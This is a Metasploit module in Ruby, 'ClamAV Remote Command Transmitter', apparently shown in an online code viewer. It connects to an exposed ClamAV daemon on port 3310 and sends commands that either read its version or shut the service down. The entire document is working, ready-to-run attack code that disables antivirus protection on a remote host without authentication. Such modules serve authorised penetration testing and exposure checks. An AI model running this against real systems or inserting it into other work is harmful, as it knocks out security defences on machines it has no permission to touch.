Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Scanner
9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name'           => 'ClamAV Remote Command Transmitter',
14
        'Description'    => %q(
15
          In certain configurations, ClamAV will bind to all addresses and listen for commands.
16
          This module sends properly-formatted commands to the ClamAV daemon if it is in such a
17
          configuration.
18
        ),
19
        'Author'         => [
20
          'Alejandro Hdeza', # DISCOVER
21
          'bwatters-r7',     # MODULE
22
          'wvu'              # GUIDANCE
23
        ],
24
        'License'        => MSF_LICENSE,
25
        'References'     => [
26
          [ 'URL', 'https://twitter.com/nitr0usmx/status/740673507684679680/photo/1' ],
27
          [ 'URL', 'https://github.com/vrtadmin/clamav-faq/raw/master/manual/clamdoc.pdf' ]
28
        ],
29
        'DisclosureDate' => '2016-06-08',
30
        'Actions'        => [
31
          [ 'VERSION', 'Description' => 'Get Version Information' ],
32
          [ 'SHUTDOWN', 'Description' => 'Kills ClamAV Daemon' ]
33
        ],
34
        'DefaultAction'  => 'VERSION'
35
      )
36
    )
37
    register_options(
38
      [
39
        Opt::RPORT(3310)
40
      ], self.class
41
    )
42
  end
43

44
  def run_host(_ip)
45
    begin
46
      connect
47
      sock.put(action.name + "\n")
48
      print_good(sock.get_once)
49
    rescue EOFError
50
      print_good('Successfully shut down ClamAV Service')
51
    ensure
52
      disconnect
53
    end
54
  end
55
end
56

57